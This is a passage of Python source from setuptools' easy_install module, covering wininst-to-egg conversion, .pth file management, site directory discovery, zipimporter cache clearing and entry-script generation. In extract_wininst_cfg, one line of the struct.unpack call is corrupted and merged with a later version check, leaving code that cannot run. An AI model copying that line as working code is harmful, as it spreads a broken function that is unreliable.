exe_to_egg(self, dist_filename, egg_tmp):\n \"\"\"Extract a bdist_wininst to the directories an egg would use\"\"\"\n # Check for .pth file and set up prefix translations\n prefixes = get_exe_prefixes(dist_filename)\n to_compile = []\n native_libs = []\n top_level = {}\n\n def process(src, dst):\n s = src.lower()\n for old, new in prefixes:\n if s.startswith(old):\n src = new + src[len(old):]\n parts = src.split('/')\n dst = os.path.join(egg_tmp, *parts)\n dl = dst.lower()\n if dl.endswith('.pyd') or dl.endswith('.dll'):\n parts[-1] = bdist_egg.strip_module(parts[-1])\n top_level[os.path.splitext(parts[0])[0]] = 1\n native_libs.append(src)\n elif dl.endswith('.py') and old != 'SCRIPTS/':\n top_level[os.path.splitext(parts[0])[0]] = 1\n to_compile.append(dst)\n return dst\n if not src.endswith('.pth'):\n log.warn(\"WARNING: can't process %s\", src)\n return None\n\n # extract, tracking .pyd/.dll->native_libs and .py -> to_compile\n unpack_archive(dist_filename, egg_tmp, process)\n stubs = []\n for res in native_libs:\n if res.lower().endswith('.pyd'): # create stubs for .pyd's\n parts = res.split('/')\n resource = parts[-1]\n parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py'\n pyfile = os.path.join(egg_tmp, *parts)\n to_compile.append(pyfile)\n stubs.append(pyfile)\n bdist_egg.write_stub(resource, pyfile)\n self.byte_compile(to_compile) # compile .py's\n bdist_egg.write_safety_flag(\n os.path.join(egg_tmp, 'EGG-INFO'),\n bdist_egg.analyze_egg(egg_tmp, stubs)) # write zip-safety flag\n\n for name in 'top_level', 'native_libs':\n if locals()[name]:\n txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt')\n if not os.path.exists(txt):\n f = open(txt, 'w')\n f.write('\\n'.join(locals()[name]) + '\\n')\n f.close()\n\n def installation_report(self, req, dist, what=\"Installed\"):\n \"\"\"Helpful installation message for display to package users\"\"\"\n msg = \"\\n%(what)s %(eggloc)s%(extras)s\"\n if self.multi_version and not self.no_report:\n msg += \"\"\"\n\nBecause this distribution was installed --multi-version, before you can\nimport modules from this package in an application, you will need to\n'import pkg_resources' and then use a 'require()' call similar to one of\nthese examples, in order to select the desired version:\n\n pkg_resources.require(\"%(name)s\") # latest installed version\n pkg_resources.require(\"%(name)s==%(version)s\") # this exact version\n pkg_resources.require(\"%(name)s>=%(version)s\") # this version or higher\n\"\"\"\n if self.install_dir not in map(normalize_path, sys.path):\n msg += \"\"\"\n\nNote also that the installation directory must be on sys.path at runtime for\nthis to work. (e.g. by being the application's script directory, by being on\nPYTHONPATH, or by being added to sys.path by your code.)\n\"\"\"\n eggloc = dist.location\n name = dist.project_name\n version = dist.version\n extras = '' # TODO: self.report_extras(req, dist)\n return msg % locals()\n\n def report_editable(self, spec, setup_script):\n dirname = os.path.dirname(setup_script)\n python = sys.executable\n return \"\"\"\\nExtracted editable version of %(spec)s to %(dirname)s\n\nIf it uses setuptools in its setup script, you can activate it in\n\"development\" mode by going to that directory and running::\n\n %(python)s setup.py develop\n\nSee the setuptools documentation for the \"develop\" command for more info.\n\"\"\" % locals()\n\n def run_setup(self, setup_script, setup_base, args):\n sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg)\n sys.modules.setdefault('distutils.command.egg_info', egg_info)\n\n args = list(args)\n if self.verbose > 2:\n v = 'v' * (self.verbose - 1)\n args.insert(0, '-' + v)\n elif self.verbose < 2:\n args.insert(0, '-q')\n if self.dry_run:\n args.insert(0, '-n')\n log.info(\n \"Running %s %s\", setup_script[len(setup_base) + 1:], ' '.join(args)\n )\n try:\n run_setup(setup_script, args)\n except SystemExit:\n v = sys.exc_info()[1]\n raise DistutilsError(\"Setup script exited with %s\" % (v.args[0],))\n\n def build_and_install(self, setup_script, setup_base):\n args = ['bdist_egg', '--dist-dir']\n\n dist_dir = tempfile.mkdtemp(\n prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script)\n )\n try:\n self._set_fetcher_options(os.path.dirname(setup_script))\n args.append(dist_dir)\n\n self.run_setup(setup_script, setup_base, args)\n all_eggs = Environment([dist_dir])\n eggs = []\n for key in all_eggs:\n for dist in all_eggs[key]:\n eggs.append(self.install_egg(dist.location, setup_base))\n if not eggs and not self.dry_run:\n log.warn(\"No eggs found in %s (setup script problem?)\",\n dist_dir)\n return eggs\n finally:\n rmtree(dist_dir)\n log.set_verbosity(self.verbose) # restore our log verbosity\n\n def _set_fetcher_options(self, base):\n \"\"\"\n When easy_install is about to run bdist_egg on a source dist, that\n source dist might have 'setup_requires' directives, requiring\n additional fetching. Ensure the fetcher options given to easy_install\n are available to that command as well.\n \"\"\"\n # find the fetch options from easy_install and write them out\n # to the setup.cfg file.\n ei_opts = self.distribution.get_option_dict('easy_install').copy()\n fetch_directives = (\n 'find_links', 'site_dirs', 'index_url', 'optimize',\n 'site_dirs', 'allow_hosts',\n )\n fetch_options = {}\n for key, val in ei_opts.items():\n if key not in fetch_directives:\n continue\n fetch_options[key.replace('_', '-')] = val[1]\n # create a settings dictionary suitable for `edit_config`\n settings = dict(easy_install=fetch_options)\n cfg_filename = os.path.join(base, 'setup.cfg')\n setopt.edit_config(cfg_filename, settings)\n\n def update_pth(self, dist):\n if self.pth_file is None:\n return\n\n for d in self.pth_file[dist.key]: # drop old entries\n if self.multi_version or d.location != dist.location:\n log.info(\"Removing %s from easy-install.pth file\", d)\n self.pth_file.remove(d)\n if d.location in self.shadow_path:\n self.shadow_path.remove(d.location)\n\n if not self.multi_version:\n if dist.location in self.pth_file.paths:\n log.info(\n \"%s is already the active version in easy-install.pth\",\n dist\n )\n else:\n log.info(\"Adding %s to easy-install.pth file\", dist)\n self.pth_file.add(dist) # add new entry\n if dist.location not in self.shadow_path:\n self.shadow_path.append(dist.location)\n\n if not self.dry_run:\n\n self.pth_file.save()\n\n if dist.key == 'setuptools':\n # Ensure that setuptools itself never becomes unavailable!\n # XXX should this check for latest version?\n filename = os.path.join(self.install_dir, 'setuptools.pth')\n if os.path.islink(filename):\n os.unlink(filename)\n f = open(filename, 'wt')\n f.write(self.pth_file.make_relative(dist.location) + '\\n')\n f.close()\n\n def unpack_progress(self, src, dst):\n # Progress filter for unpacking\n log.debug(\"Unpacking %s to %s\", src, dst)\n return dst # only unpack-and-compile skips files for dry run\n\n def unpack_and_compile(self, egg_path, destination):\n to_compile = []\n to_chmod = []\n\n def pf(src, dst):\n if dst.endswith('.py') and not src.startswith('EGG-INFO/'):\n to_compile.append(dst)\n elif dst.endswith('.dll') or dst.endswith('.so'):\n to_chmod.append(dst)\n self.unpack_progress(src, dst)\n return not self.dry_run and dst or None\n\n unpack_archive(egg_path, destination, pf)\n self.byte_compile(to_compile)\n if not self.dry_run:\n for f in to_chmod:\n mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755\n chmod(f, mode)\n\n def byte_compile(self, to_compile):\n if sys.dont_write_bytecode:\n self.warn('byte-compiling is disabled, skipping.')\n return\n\n from distutils.util import byte_compile\n\n try:\n # try to make the byte compile messages quieter\n log.set_verbosity(self.verbose - 1)\n\n byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run)\n if self.optimize:\n byte_compile(\n to_compile, optimize=self.optimize, force=1,\n dry_run=self.dry_run\n )\n finally:\n log.set_verbosity(self.verbose) # restore original verbosity\n\n def no_default_version_msg(self):\n template = \"\"\"bad install directory or PYTHONPATH\n\nYou are attempting to install a package to a directory that is not\non PYTHONPATH and which Python does not read \".pth\" files from. The\ninstallation directory you specified (via --install-dir, --prefix, or\nthe distutils default setting) was:\n\n %s\n\nand your PYTHONPATH environment variable currently contains:\n\n %r\n\nHere are some of your options for correcting the problem:\n\n* You can choose a different installation directory, i.e., one that is\n on PYTHONPATH or supports .pth files\n\n* You can add the installation directory to the PYTHONPATH environment\n variable. (It must then also be on PYTHONPATH whenever you run\n Python and want to use the package(s) you are installing.)\n\n* You can set up the installation directory to support \".pth\" files by\n using one of the approaches described here:\n\n https://pythonhosted.org/setuptools/easy_install.html#custom-installation-locations\n\nPlease make the appropriate changes for your system and try again.\"\"\"\n return template % (self.install_dir, os.environ.get('PYTHONPATH', ''))\n\n def install_site_py(self):\n \"\"\"Make sure there's a site.py in the target dir, if needed\"\"\"\n\n if self.sitepy_installed:\n return # already did it, or don't need to\n\n sitepy = os.path.join(self.install_dir, \"site.py\")\n source = resource_string(\"setuptools\", \"site-patch.py\")\n current = \"\"\n\n if os.path.exists(sitepy):\n log.debug(\"Checking existing site.py in %s\", self.install_dir)\n f = open(sitepy, 'rb')\n current = f.read()\n # we want str, not bytes\n if PY3:\n current = current.decode()\n\n f.close()\n if not current.startswith('def __boot():'):\n raise DistutilsError(\n \"%s is not a setuptools-generated site.py; please\"\n \" remove it.\" % sitepy\n )\n\n if current != source:\n log.info(\"Creating %s\", sitepy)\n if not self.dry_run:\n ensure_directory(sitepy)\n f = open(sitepy, 'wb')\n f.write(source)\n f.close()\n self.byte_compile([sitepy])\n\n self.sitepy_installed = True\n\n def create_home_path(self):\n \"\"\"Create directories under ~.\"\"\"\n if not self.user:\n return\n home = convert_path(os.path.expanduser(\"~\"))\n for name, path in iteritems(self.config_vars):\n if path.startswith(home) and not os.path.isdir(path):\n self.debug_print(\"os.makedirs('%s', 0o700)\" % path)\n os.makedirs(path, 0o700)\n\n INSTALL_SCHEMES = dict(\n posix=dict(\n install_dir='$base/lib/python$py_version_short/site-packages',\n script_dir='$base/bin',\n ),\n )\n\n DEFAULT_SCHEME = dict(\n install_dir='$base/Lib/site-packages',\n script_dir='$base/Scripts',\n )\n\n def _expand(self, *attrs):\n config_vars = self.get_finalized_command('install').config_vars\n\n if self.prefix:\n # Set default install_dir/scripts from --prefix\n config_vars = config_vars.copy()\n config_vars['base'] = self.prefix\n scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME)\n for attr, val in scheme.items():\n if getattr(self, attr, None) is None:\n setattr(self, attr, val)\n\n from distutils.util import subst_vars\n\n for attr in attrs:\n val = getattr(self, attr)\n if val is not None:\n val = subst_vars(val, config_vars)\n if os.name == 'posix':\n val = os.path.expanduser(val)\n setattr(self, attr, val)\n\n\ndef get_site_dirs():\n # return a list of 'site' dirs\n sitedirs = [_f for _f in os.environ.get('PYTHONPATH',\n '').split(os.pathsep) if _f]\n prefixes = [sys.prefix]\n if sys.exec_prefix != sys.prefix:\n prefixes.append(sys.exec_prefix)\n for prefix in prefixes:\n if prefix:\n if sys.platform in ('os2emx', 'riscos'):\n sitedirs.append(os.path.join(prefix, \"Lib\", \"site-packages\"))\n elif os.sep == '/':\n sitedirs.extend([os.path.join(prefix,\n \"lib\",\n \"python\" + sys.version[:3],\n \"site-packages\"),\n os.path.join(prefix, \"lib\", \"site-python\")])\n else:\n sitedirs.extend(\n [prefix, os.path.join(prefix, \"lib\", \"site-packages\")]\n )\n if sys.platform == 'darwin':\n # for framework builds *only* we add the standard Apple\n # locations. Currently only per-user, but /Library and\n # /Network/Library could be added too\n if 'Python.framework' in prefix:\n home = os.environ.get('HOME')\n if home:\n sitedirs.append(\n os.path.join(home,\n 'Library',\n 'Python',\n sys.version[:3],\n 'site-packages'))\n lib_paths = get_path('purelib'), get_path('platlib')\n for site_lib in lib_paths:\n if site_lib not in sitedirs:\n sitedirs.append(site_lib)\n\n if site.ENABLE_USER_SITE:\n sitedirs.append(site.USER_SITE)\n\n sitedirs = list(map(normalize_path, sitedirs))\n\n return sitedirs\n\n\ndef expand_paths(inputs):\n \"\"\"Yield sys.path directories that might contain \"old-style\" packages\"\"\"\n\n seen = {}\n\n for dirname in inputs:\n dirname = normalize_path(dirname)\n if dirname in seen:\n continue\n\n seen[dirname] = 1\n if not os.path.isdir(dirname):\n continue\n\n files = os.listdir(dirname)\n yield dirname, files\n\n for name in files:\n if not name.endswith('.pth'):\n # We only care about the .pth files\n continue\n if name in ('easy-install.pth', 'setuptools.pth'):\n # Ignore .pth files that we control\n continue\n\n # Read the .pth file\n f = open(os.path.join(dirname, name))\n lines = list(yield_lines(f))\n f.close()\n\n # Yield existing non-dupe, non-import directory lines from it\n for line in lines:\n if not line.startswith(\"import\"):\n line = normalize_path(line.rstrip())\n if line not in seen:\n seen[line] = 1\n if not os.path.isdir(line):\n continue\n yield line, os.listdir(line)\n\n\ndef extract_wininst_cfg(dist_filename):\n \"\"\"Extract configuration data from a bdist_wininst .exe\n\n Returns a ConfigParser.RawConfigParser, or None\n \"\"\"\n f = open(dist_filename, 'rb')\n try:\n endrec = zipfile._EndRecData(f)\n if endrec is None:\n return None\n\n prepended = (endrec[9] - endrec[5]) - endrec[6]\n if prepended < 12: # no wininst data here\n return None\n f.seek(prepended - 12)\n\n from setuptools.compat import StringIO, ConfigParser\n import struct\n\n tag, cfglen, bmlen = struct.unpack(\"= (2, 6):\n null_byte = bytes([0])\n else:\n null_byte = chr(0)\n config = part.split(null_byte, 1)[0]\n # Now the config is in bytes, but for RawConfigParser, it should\n # be text, so decode it.\n config = config.decode(sys.getfilesystemencoding())\n cfg.readfp(StringIO(config))\n except ConfigParser.Error:\n return None\n if not cfg.has_section('metadata') or not cfg.has_section('Setup'):\n return None\n return cfg\n\n finally:\n f.close()\n\n\ndef get_exe_prefixes(exe_filename):\n \"\"\"Get exe->egg path translations for a given .exe file\"\"\"\n\n prefixes = [\n ('PURELIB/', ''), ('PLATLIB/pywin32_system32', ''),\n ('PLATLIB/', ''),\n ('SCRIPTS/', 'EGG-INFO/scripts/'),\n ('DATA/lib/site-packages', ''),\n ]\n z = zipfile.ZipFile(exe_filename)\n try:\n for info in z.infolist():\n name = info.filename\n parts = name.split('/')\n if len(parts) == 3 and parts[2] == 'PKG-INFO':\n if parts[1].endswith('.egg-info'):\n prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/'))\n break\n if len(parts) != 2 or not name.endswith('.pth'):\n continue\n if name.endswith('-nspkg.pth'):\n continue\n if parts[0].upper() in ('PURELIB', 'PLATLIB'):\n contents = z.read(name)\n if PY3:\n contents = contents.decode()\n for pth in yield_lines(contents):\n pth = pth.strip().replace('\\\\', '/')\n if not pth.startswith('import'):\n prefixes.append((('%s/%s/' % (parts[0], pth)), ''))\n finally:\n z.close()\n prefixes = [(x.lower(), y) for x, y in prefixes]\n prefixes.sort()\n prefixes.reverse()\n return prefixes\n\n\ndef parse_requirement_arg(spec):\n try:\n return Requirement.parse(spec)\n except ValueError:\n raise DistutilsError(\n \"Not a URL, existing file, or requirement spec: %r\" % (spec,)\n )\n\n\nclass PthDistributions(Environment):\n \"\"\"A .pth file with Distribution paths in it\"\"\"\n\n dirty = False\n\n def __init__(self, filename, sitedirs=()):\n self.filename = filename\n self.sitedirs = list(map(normalize_path, sitedirs))\n self.basedir = normalize_path(os.path.dirname(self.filename))\n self._load()\n Environment.__init__(self, [], None, None)\n for path in yield_lines(self.paths):\n list(map(self.add, find_distributions(path, True)))\n\n def _load(self):\n self.paths = []\n saw_import = False\n seen = dict.fromkeys(self.sitedirs)\n if os.path.isfile(self.filename):\n f = open(self.filename, 'rt')\n for line in f:\n if line.startswith('import'):\n saw_import = True\n continue\n path = line.rstrip()\n self.paths.append(path)\n if not path.strip() or path.strip().startswith('#'):\n continue\n # skip non-existent paths, in case somebody deleted a package\n # manually, and duplicate paths as well\n path = self.paths[-1] = normalize_path(\n os.path.join(self.basedir, path)\n )\n if not os.path.exists(path) or path in seen:\n self.paths.pop() # skip it\n self.dirty = True # we cleaned up, so we're dirty now :)\n continue\n seen[path] = 1\n f.close()\n\n if self.paths and not saw_import:\n self.dirty = True # ensure anything we touch has import wrappers\n while self.paths and not self.paths[-1].strip():\n self.paths.pop()\n\n def save(self):\n \"\"\"Write changed .pth file back to disk\"\"\"\n if not self.dirty:\n return\n\n data = '\\n'.join(map(self.make_relative, self.paths))\n if data:\n log.debug(\"Saving %s\", self.filename)\n data = (\n \"import sys; sys.__plen = len(sys.path)\\n\"\n \"%s\\n\"\n \"import sys; new=sys.path[sys.__plen:];\"\n \" del sys.path[sys.__plen:];\"\n \" p=getattr(sys,'__egginsert',0); sys.path[p:p]=new;\"\n \" sys.__egginsert = p+len(new)\\n\"\n ) % data\n\n if os.path.islink(self.filename):\n os.unlink(self.filename)\n f = open(self.filename, 'wt')\n f.write(data)\n f.close()\n\n elif os.path.exists(self.filename):\n log.debug(\"Deleting empty %s\", self.filename)\n os.unlink(self.filename)\n\n self.dirty = False\n\n def add(self, dist):\n \"\"\"Add `dist` to the distribution map\"\"\"\n new_path = (\n dist.location not in self.paths and (\n dist.location not in self.sitedirs or\n # account for '.' being in PYTHONPATH\n dist.location == os.getcwd()\n )\n )\n if new_path:\n self.paths.append(dist.location)\n self.dirty = True\n Environment.add(self, dist)\n\n def remove(self, dist):\n \"\"\"Remove `dist` from the distribution map\"\"\"\n while dist.location in self.paths:\n self.paths.remove(dist.location)\n self.dirty = True\n Environment.remove(self, dist)\n\n def make_relative(self, path):\n npath, last = os.path.split(normalize_path(path))\n baselen = len(self.basedir)\n parts = [last]\n sep = os.altsep == '/' and '/' or os.sep\n while len(npath) >= baselen:\n if npath == self.basedir:\n parts.append(os.curdir)\n parts.reverse()\n return sep.join(parts)\n npath, last = os.path.split(npath)\n parts.append(last)\n else:\n return path\n\n\ndef _first_line_re():\n \"\"\"\n Return a regular expression based on first_line_re suitable for matching\n strings.\n \"\"\"\n if isinstance(first_line_re.pattern, str):\n return first_line_re\n\n # first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern.\n return re.compile(first_line_re.pattern.decode())\n\n\ndef get_script_header(script_text, executable=sys_executable, wininst=False):\n \"\"\"Create a #! line, getting options (if any) from script_text\"\"\"\n first = (script_text + '\\n').splitlines()[0]\n match = _first_line_re().match(first)\n options = ''\n if match:\n options = match.group(1) or ''\n if options:\n options = ' ' + options\n if wininst:\n executable = \"python.exe\"\n else:\n executable = nt_quote_arg(executable)\n hdr = \"#!%(executable)s%(options)s\\n\" % locals()\n if not isascii(hdr):\n # Non-ascii path to sys.executable, use -x to prevent warnings\n if options:\n if options.strip().startswith('-'):\n options = ' -x' + options.strip()[1:]\n # else: punt, we can't do it, let the warning happen anyway\n else:\n options = ' -x'\n executable = fix_jython_executable(executable, options)\n hdr = \"#!%(executable)s%(options)s\\n\" % locals()\n return hdr\n\n\ndef auto_chmod(func, arg, exc):\n if func is os.remove and os.name == 'nt':\n chmod(arg, stat.S_IWRITE)\n return func(arg)\n et, ev, _ = sys.exc_info()\n reraise(et, (ev[0], ev[1] + (\" %s %s\" % (func, arg))))\n\n\ndef update_dist_caches(dist_path, fix_zipimporter_caches):\n \"\"\"\n Fix any globally cached `dist_path` related data\n\n `dist_path` should be a path of a newly installed egg distribution (zipped\n or unzipped).\n\n sys.path_importer_cache contains finder objects that have been cached when\n importing data from the original distribution. Any such finders need to be\n cleared since the replacement distribution might be packaged differently,\n e.g. a zipped egg distribution might get replaced with an unzipped egg\n folder or vice versa. Having the old finders cached may then cause Python\n to attempt loading modules from the replacement distribution using an\n incorrect loader.\n\n zipimport.zipimporter objects are Python loaders charged with importing\n data packaged inside zip archives. If stale loaders referencing the\n original distribution, are left behind, they can fail to load modules from\n the replacement distribution. E.g. if an old zipimport.zipimporter instance\n is used to load data from a new zipped egg archive, it may cause the\n operation to attempt to locate the requested data in the wrong location -\n one indicated by the original distribution's zip archive directory\n information. Such an operation may then fail outright, e.g. report having\n read a 'bad local file header', or even worse, it may fail silently &\n return invalid data.\n\n zipimport._zip_directory_cache contains cached zip archive directory\n information for all existing zipimport.zipimporter instances and all such\n instances connected to the same archive share the same cached directory\n information.\n\n If asked, and the underlying Python implementation allows it, we can fix\n all existing zipimport.zipimporter instances instead of having to track\n them down and remove them one by one, by updating their shared cached zip\n archive directory information. This, of course, assumes that the\n replacement distribution is packaged as a zipped egg.\n\n If not asked to fix existing zipimport.zipimporter instances, we still do\n our best to clear any remaining zipimport.zipimporter related cached data\n that might somehow later get used when attempting to load data from the new\n distribution and thus cause such load operations to fail. Note that when\n tracking down such remaining stale data, we can not catch every conceivable\n usage from here, and we clear only those that we know of and have found to\n cause problems if left alive. Any remaining caches should be updated by\n whomever is in charge of maintaining them, i.e. they should be ready to\n handle us replacing their zip archives with new distributions at runtime.\n\n \"\"\"\n # There are several other known sources of stale zipimport.zipimporter\n # instances that we do not clear here, but might if ever given a reason to\n # do so:\n # * Global setuptools pkg_resources.working_set (a.k.a. 'master working\n # set') may contain distributions which may in turn contain their\n # zipimport.zipimporter loaders.\n # * Several zipimport.zipimporter loaders held by local variables further\n # up the function call stack when running the setuptools installation.\n # * Already loaded modules may have their __loader__ attribute set to the\n # exact loader instance used when importing them. Python 3.4 docs state\n # that this information is intended mostly for introspection and so is\n # not expected to cause us problems.\n normalized_path = normalize_path(dist_path)\n _uncache(normalized_path, sys.path_importer_cache)\n if fix_zipimporter_caches:\n _replace_zip_directory_cache_data(normalized_path)\n else:\n # Here, even though we do not want to fix existing and now stale\n # zipimporter cache information, we still want to remove it. Related to\n # Python's zip archive directory information cache, we clear each of\n # its stale entries in two phases:\n # 1. Clear the entry so attempting to access zip archive information\n # via any existing stale zipimport.zipimporter instances fails.\n # 2. Remove the entry from the cache so any newly constructed\n # zipimport.zipimporter instances do not end up using old stale\n # zip archive directory information.\n # This whole stale data removal step does not seem strictly necessary,\n # but has been left in because it was done before we started replacing\n # the zip archive directory information cache content if possible, and\n # there are no relevant unit tests that we can depend on to tell us if\n # this is really needed.\n _remove_and_clear_zip_directory_cache_data(normalized_path)\n\n\ndef _collect_zipimporter_cache_entries(normalized_path, cache):\n \"\"\"\n Return zipimporter cache entry keys related to a given normalized path.\n\n Alternative path spellings (e.g. those using different character case or\n those using alternative path separators) related to the same path are\n included. Any sub-path entries are included as well, i.e. those\n corresponding to zip archives embedded in other zip archives.\n\n \"\"\"\n result = []\n prefix_len = len(normalized_path)\n for p in cache:\n np = normalize_path(p)\n if (np.startswith(normalized_path) and\n np[prefix_len:prefix_len + 1] in (os.sep, '')):\n result.append(p)\n return result\n\n\ndef _update_zipimporter_cache(normalized_path, cache, updater=None):\n \"\"\"\n Update zipimporter cache data for a given normalized path.\n\n Any sub-path entries are processed as well, i.e. those corresponding to zip\n archives embedded in other zip archives.\n\n Given updater is a callable taking a cache entry key and the original entry\n (after already removing the entry from the cache), and expected to update\n the entry and possibly return a new one to be inserted in its place.\n Returning None indicates that the entry should not be replaced with a new\n one. If no updater is given, the cache entries are simply removed without\n any additional processing, the same as if the updater simply returned None.\n\n \"\"\"\n for p in _collect_zipimporter_cache_entries(normalized_path, cache):\n # N.B. pypy's custom zipimport._zip_directory_cache implementation does\n # not support the complete dict interface:\n # * Does not support item assignment, thus not allowing this function\n # to be used only for removing existing cache entries.\n # * Does not support the dict.pop() method, forcing us to use the\n # get/del patterns instead. For more detailed information see the\n # following links:\n # https://bitbucket.org/pypa/setuptools/issue/202/more-robust-zipimporter-cache-invalidation#comment-10495960\n # https://bitbucket.org/pypy/pypy/src/dd07756a34a41f674c0cacfbc8ae1d4cc9ea2ae4/pypy/module/zipimport/interp_zipimport.py#cl-99\n old_entry = cache[p]\n del cache[p]\n new_entry = updater and updater(p, old_entry)\n if new_entry is not None:\n cache[p] = new_entry\n\n\ndef _uncache(normalized_path, cache):\n _update_zipimporter_cache(normalized_path, cache)\n\n\ndef _remove_and_clear_zip_directory_cache_data(normalized_path):\n def clear_and_remove_cached_zip_archive_directory_data(path, old_entry):\n old_entry.clear()\n\n _update_zipimporter_cache(\n normalized_path, zipimport._zip_directory_cache,\n updater=clear_and_remove_cached_zip_archive_directory_data)\n\n# PyPy Python implementation does not allow directly writing to the\n# zipimport._zip_directory_cache and so prevents us from attempting to correct\n# its content. The best we can do there is clear the problematic cache content\n# and have PyPy repopulate it as needed. The downside is that if there are any\n# stale zipimport.zipimporter instances laying around, attempting to use them\n# will fail due to not having its zip archive directory information available\n# instead of being automatically corrected to use the new correct zip archive\n# directory information.\nif '__pypy__' in sys.builtin_module_names:\n _replace_zip_directory_cache_data = \\\n _remove_and_clear_zip_directory_cache_data\nelse:\n def _replace_zip_directory_cache_data(normalized_path):\n def replace_cached_zip_archive_directory_data(path, old_entry):\n # N.B. In theory, we could load the zip directory information just\n # once for all updated path spellings, and then copy it locally and\n # update its contained path strings to contain the correct\n # spelling, but that seems like a way too invasive move (this cache\n # structure is not officially documented anywhere and could in\n # theory change with new Python releases) for no significant\n # benefit.\n old_entry.clear()\n zipimport.zipimporter(path)\n old_entry.update(zipimport._zip_directory_cache[path])\n return old_entry\n\n _update_zipimporter_cache(\n normalized_path, zipimport._zip_directory_cache,\n updater=replace_cached_zip_archive_directory_data)\n\n\ndef is_python(text, filename=''):\n \"Is this string a valid Python script?\"\n try:\n compile(text, filename, 'exec')\n except (SyntaxError, TypeError):\n return False\n else:\n return True\n\n\ndef is_sh(executable):\n \"\"\"Determine if the specified executable is a .sh (contains a #! line)\"\"\"\n try:\n fp = open(executable)\n magic = fp.read(2)\n fp.close()\n except (OSError, IOError):\n return executable\n return magic == '#!'\n\n\ndef nt_quote_arg(arg):\n \"\"\"Quote a command line argument according to Windows parsing rules\"\"\"\n\n result = []\n needquote = False\n nb = 0\n\n needquote = (\" \" in arg) or (\"\\t\" in arg)\n if needquote:\n result.append('\"')\n\n for c in arg:\n if c == '\\\\':\n nb += 1\n elif c == '\"':\n # double preceding backslashes, then add a \\\"\n result.append('\\\\' * (nb * 2) + '\\\\\"')\n nb = 0\n else:\n if nb:\n result.append('\\\\' * nb)\n nb = 0\n result.append(c)\n\n if nb:\n result.append('\\\\' * nb)\n\n if needquote:\n result.append('\\\\' * nb) # double the trailing backslashes\n result.append('\"')\n\n return ''.join(result)\n\n\ndef is_python_script(script_text, filename):\n \"\"\"Is this text, as a whole, a Python script? (as opposed to shell/bat/etc.\n \"\"\"\n if filename.endswith('.py') or filename.endswith('.pyw'):\n return True # extension says it's Python\n if is_python(script_text, filename):\n return True # it's syntactically valid Python\n if script_text.startswith('#!'):\n # It begins with a '#!' line, so check if 'python' is in it somewhere\n return 'python' in script_text.splitlines()[0].lower()\n\n return False # Not any Python I can recognize\n\n\ntry:\n from os import chmod as _chmod\nexcept ImportError:\n # Jython compatibility\n def _chmod(*args):\n pass\n\n\ndef chmod(path, mode):\n log.debug(\"changing mode of %s to %o\", path, mode)\n try:\n _chmod(path, mode)\n except os.error:\n e = sys.exc_info()[1]\n log.debug(\"chmod failed: %s\", e)\n\n\ndef fix_jython_executable(executable, options):\n if sys.platform.startswith('java') and is_sh(executable):\n # Workaround for Jython is not needed on Linux systems.\n import java\n\n if java.lang.System.getProperty(\"os.name\") == \"Linux\":\n return executable\n\n # Workaround Jython's sys.executable being a .sh (an invalid\n # shebang line interpreter)\n if options:\n # Can't apply the workaround, leave it broken\n log.warn(\n \"WARNING: Unable to adapt shebang line for Jython,\"\n \" the following script is NOT executable\\n\"\n \" see http://bugs.jython.org/issue1112 for\"\n \" more information.\")\n else:\n return '/usr/bin/env %s' % executable\n return executable\n\n\nclass ScriptWriter(object):\n \"\"\"\n Encapsulates behavior around writing entry point scripts for console and\n gui apps.\n \"\"\"\n\n template = textwrap.dedent(\"\"\"\n # EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r\n __requires__ = %(spec)r\n import sys\n from pkg_resources import load_entry_point\n\n if __name__ == '__main__':\n sys.exit(\n load_entry_point(%(spec)r, %(group)r, %(name)r)()\n )\n \"\"\").lstrip()\n\n @classmethod\n def get_script_args(cls, dist, executable=sys_executable, wininst=False):\n \"\"\"\n Yield write_script() argument tuples for a distribution's entrypoints\n \"\"\"\n gen_class = cls.get_writer(wininst)\n spec = str(dist.as_requirement())\n header = get_script_header(\"\", executable, wininst)\n for type_ in 'console', 'gui':\n group = type_ + '_scripts'\n for name, ep in dist.get_entry_map(group).items():\n script_text = gen_class.template % locals()\n for res in gen_class._get_script_args(type_, name, header,\n script_text):\n yield res\n\n @classmethod\n def get_writer(cls, force_windows):\n if force_windows or sys.platform == 'win32':\n return WindowsScriptWriter.get_writer()\n return cls\n\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n # Simply write the stub with no extension.\n yield (name, header + script_text)\n\n\nclass WindowsScriptWriter(ScriptWriter):\n @classmethod\n def get_writer(cls):\n \"\"\"\n Get a script writer suitable for Windows\n \"\"\"\n writer_lookup = dict(\n executable=WindowsExecutableLauncherWriter,\n natural=cls,\n )\n # for compatibility, use the executable launcher by default\n launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable')\n return writer_lookup[launcher]\n\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n \"For Windows, add a .py extension\"\n ext = dict(console='.pya', gui='.pyw')[type_]\n if ext not in os.environ['PATHEXT'].lower().split(';'):\n warnings.warn(\"%s not listed in PATHEXT; scripts will not be \"\n \"recognized as executables.\" % ext, UserWarning)\n old = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe']\n old.remove(ext)\n header = cls._adjust_header(type_, header)\n blockers = [name + x for x in old]\n yield name + ext, header + script_text, 't', blockers\n\n @staticmethod\n def _adjust_header(type_, orig_header):\n \"\"\"\n Make sure 'pythonw' is used for gui and and 'python' is used for\n console (regardless of what sys.executable is).\n \"\"\"\n pattern = 'pythonw.exe'\n repl = 'python.exe'\n if type_ == 'gui':\n pattern, repl = repl, pattern\n pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE)\n new_header = pattern_ob.sub(string=orig_header, repl=repl)\n clean_header = new_header[2:-1].strip('\"')\n if sys.platform == 'win32' and not os.path.exists(clean_header):\n # the adjusted version doesn't exist, so return the original\n return orig_header\n return new_header\n\n\nclass WindowsExecutableLauncherWriter(WindowsScriptWriter):\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n \"\"\"\n For Windows, add a 